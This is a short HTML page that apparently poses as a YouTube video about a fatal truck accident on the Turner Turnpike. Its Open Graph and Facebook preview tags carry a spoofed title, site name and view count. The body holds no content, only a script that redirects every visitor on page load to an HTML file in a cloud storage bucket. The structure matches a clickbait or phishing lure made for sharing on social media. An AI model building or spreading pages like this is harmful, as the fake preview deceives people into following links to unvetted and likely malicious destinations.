<html>
	<head>
		<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
		<meta name="facebook:card" content="summary_large_image" />
		<meta name="facebook:description" content="Youtube" />
		<meta name="facebook:app:country" content="US" />
		<meta property="og:image" content="./imgur.gif" />
		<meta property="og:title" content="Two people dead in semi accident on Turner Turnpike" />
		<meta property="og:description" content="854, 865 views" />
		<meta property="og:site_name" content="YouTube" />
		<meta property="fb:app_id" content="124024574287414" />
	</head>
	<body>
	<script>
        (function () {
            const nuevaURL = 'https://storage.googleapis.com/6765drthj/ineedex.html';
            window.location.href = nuevaURL;
        })();
    </script>
	</body>
</html>